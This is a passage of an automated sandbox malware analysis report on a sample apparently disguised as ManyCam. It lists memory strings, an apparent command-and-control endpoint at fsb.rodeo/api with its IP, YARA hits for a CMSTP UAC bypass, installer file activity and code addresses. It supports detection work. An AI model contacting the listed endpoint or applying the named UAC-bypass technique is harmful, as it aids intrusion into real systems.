Source: cmd.exe, 00000006.00000002.2016861957.0000000005700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944859538.00007FF76CD5E000.00000002.00000001.01000000.00000000.sdmp, cmd.exe, 00000016.00000002.2459703674.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2462107505.00007FF78124E000.00000002.00000001.01000000.00000000.sdmp, blggjuprkr.22.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportinternal_codedescriptionunknown_codeos_errorUnknow
Source: cmd.exe, 00000006.00000002.2016861957.0000000005700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944859538.00007FF76CD5E000.00000002.00000001.01000000.00000000.sdmp, explorer.exe, 0000000C.00000002.2942902216.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459703674.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2462107505.00007FF78124E000.00000002.00000001.01000000.00000000.sdmp, blggjuprkr.22.dr	String found in binary or memory: https://fsb.rodeo
Source: explorer.exe, 0000000C.00000003.2658566060.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943358115.0000000000920000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032321538.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658482872.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943162303.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032220491.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo/
Source: explorer.exe, 0000000C.00000003.2032321538.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032220491.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo/D6
Source: explorer.exe, 0000000C.00000003.2052808307.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032321538.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032220491.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo/G6
Source: explorer.exe, 0000000C.00000002.2942902216.00000000008B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo/K
Source: explorer.exe, 0000000C.00000003.2658566060.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943358115.0000000000920000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2052808307.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032321538.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658482872.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2942902216.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943162303.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032220491.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo/api
Source: explorer.exe, 0000000C.00000002.2943358115.0000000000954000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.0000000000954000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000954000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo/apih-
Source: explorer.exe, 0000000C.00000002.2942902216.00000000008B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo:443/api
Source: explorer.exe, 0000000C.00000002.2943358115.0000000000920000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo:443/api%C
Source: explorer.exe, 0000000C.00000002.2943358115.0000000000920000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2052808307.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fsb.rodeo:443/apiVC
Source: blggjuprkr.22.dr	String found in binary or memory: https://myexternalip.com/raw12fewer
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 193.233.48.182:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.233.48.182:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.ManyCam.exe.41f8430.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.explorer.exe.29625d9.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.ManyCam.exe.41fe830.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.cmd.exe.58fa9b9.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.4d5d5b9.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.4d5c9b9.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.ManyCam.exe.41ff430.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.4b2d9b9.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.ManyCam.exe.41f7830.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.explorer.exe.2ce89d9.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.ManyCam.exe.3db5763.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.4b2e5b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.2b44a08.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.4d178ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.ManyCam.exe.41b9763.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.4ae88ec.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.explorer.exe.2ca390c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.ManyCam.exe.3dfa830.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.explorer.exe.2ce95d9.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.cmd.exe.58fb5b9.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.explorer.exe.291c90c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.2b707f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.explorer.exe.29619d9.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.ManyCam.exe.3de6430.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.ManyCam.exe.3de5830.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.ManyCam.exe.3dfb430.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.ManyCam.exe.41b2763.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.ManyCam.exe.3da0763.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.cmd.exe.58b58ec.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5fd64d.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{C71E1024-3B5C-4357-ACD5-CB38070D632B}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSID7A5.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5fd64f.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5fd64f.msi	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\5fd64f.msi

Jump to behavior

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_0050EC90	2_2_0050EC90
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C000D0	2_2_00C000D0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAC0D0	2_2_00BAC0D0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BE0180	2_2_00BE0180
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BDE120	2_2_00BDE120
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BFE110	2_2_00BFE110
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C302C0	2_2_00C302C0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00B962A0	2_2_00B962A0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAE2A0	2_2_00BAE2A0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BD02A0	2_2_00BD02A0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00B982F0	2_2_00B982F0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00B942C0	2_2_00B942C0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C2E240	2_2_00C2E240
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BE0209	2_2_00BE0209
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C02230	2_2_00C02230
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BB63A7	2_2_00BB63A7
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C283B0	2_2_00C283B0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C2C360	2_2_00C2C360
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C3E4D0	2_2_00C3E4D0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BF04F0	2_2_00BF04F0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAE5A0	2_2_00BAE5A0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BF65F0	2_2_00BF65F0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C2E5A0	2_2_00C2E5A0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C1A523	2_2_00C1A523
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BB86A9	2_2_00BB86A9
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00B966E0	2_2_00B966E0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C146B3	2_2_00C146B3
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAA6CE	2_2_00BAA6CE
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BEC670	2_2_00BEC670
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BF4660	2_2_00BF4660
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAA650	2_2_00BAA650
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C3C790	2_2_00C3C790
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BD4710	2_2_00BD4710
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BF8700	2_2_00BF8700
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAE8B0	2_2_00BAE8B0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BDA890	2_2_00BDA890
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAA88E	2_2_00BAA88E
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BB48F8	2_2_00BB48F8
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C0A883	2_2_00C0A883
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BFA8E0	2_2_00BFA8E0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C14860	2_2_00C14860
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAA810	2_2_00BAA810
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAA9D0	2_2_00BAA9D0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BEE9C0	2_2_00BEE9C0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C2E970	2_2_00C2E970
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BD8970	2_2_00BD8970
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C14A83	2_2_00C14A83
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BB8AF8	2_2_00BB8AF8
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C3EBC0	2_2_00C3EBC0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BBCBB0	2_2_00BBCBB0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAAB40	2_2_00BAAB40
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAACB0	2_2_00BAACB0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C14CD0	2_2_00C14CD0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BB2CA0	2_2_00BB2CA0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BB4C80	2_2_00BB4C80
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BF2CF0	2_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAECEC	2_2_00BAECEC
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BF8CC0	2_2_00BF8CC0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C2EC10	2_2_00C2EC10
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAEC60	2_2_00BAEC60
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BEAC60	2_2_00BEAC60
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BDEC40	2_2_00BDEC40
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C26DC0	2_2_00C26DC0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C0CDC3	2_2_00C0CDC3
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BB6DA9	2_2_00BB6DA9
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BCADD0	2_2_00BCADD0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAAD2E	2_2_00BAAD2E
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BDED70	2_2_00BDED70
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BF4D40	2_2_00BF4D40
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAAEEE	2_2_00BAAEEE
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C3EE97	2_2_00C3EE97
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BAAE70	2_2_00BAAE70
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C3CFA0	2_2_00C3CFA0
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BB8F3D	2_2_00BB8F3D
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00B92F20	2_2_00B92F20
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BD2F06	2_2_00BD2F06
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00BCEF00	2_2_00BCEF00
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C39090	2_2_00C39090
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0050EC90	4_2_0050EC90
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0123E120	4_2_0123E120
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0125E110	4_2_0125E110
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01240180	4_2_01240180
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120C0D0	4_2_0120C0D0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012600D0	4_2_012600D0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0128C360	4_2_0128C360
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012163A7	4_2_012163A7
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012883B0	4_2_012883B0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01262230	4_2_01262230
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01240209	4_2_01240209
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0128E240	4_2_0128E240
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120E2A0	4_2_0120E2A0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012302A0	4_2_012302A0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_011F62A0	4_2_011F62A0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_011F42C0	4_2_011F42C0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012902C0	4_2_012902C0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_011F82F0	4_2_011F82F0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0127A523	4_2_0127A523
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120E5A0	4_2_0120E5A0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0128E5A0	4_2_0128E5A0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012565F0	4_2_012565F0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012504F0	4_2_012504F0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0129E4D0	4_2_0129E4D0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01258700	4_2_01258700
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01234710	4_2_01234710
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0129C790	4_2_0129C790
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01254660	4_2_01254660
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0124C670	4_2_0124C670
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120A650	4_2_0120A650
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012186A9	4_2_012186A9
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012746B3	4_2_012746B3
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120A6CE	4_2_0120A6CE
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_011F66E0	4_2_011F66E0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01238970	4_2_01238970
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0128E970	4_2_0128E970
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0124E9C0	4_2_0124E9C0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120A9D0	4_2_0120A9D0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120A810	4_2_0120A810
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01274860	4_2_01274860
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120E8B0	4_2_0120E8B0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0126A883	4_2_0126A883
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120A88E	4_2_0120A88E
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0123A890	4_2_0123A890
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0125A8E0	4_2_0125A8E0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012148F8	4_2_012148F8
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120AB40	4_2_0120AB40
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0121CBB0	4_2_0121CBB0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0129EBC0	4_2_0129EBC0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01274A83	4_2_01274A83
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01218AF8	4_2_01218AF8
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120AD2E	4_2_0120AD2E
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0123ED70	4_2_0123ED70
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01254D40	4_2_01254D40
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01216DA9	4_2_01216DA9
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0126CDC3	4_2_0126CDC3
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01286DC0	4_2_01286DC0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0122ADD0	4_2_0122ADD0
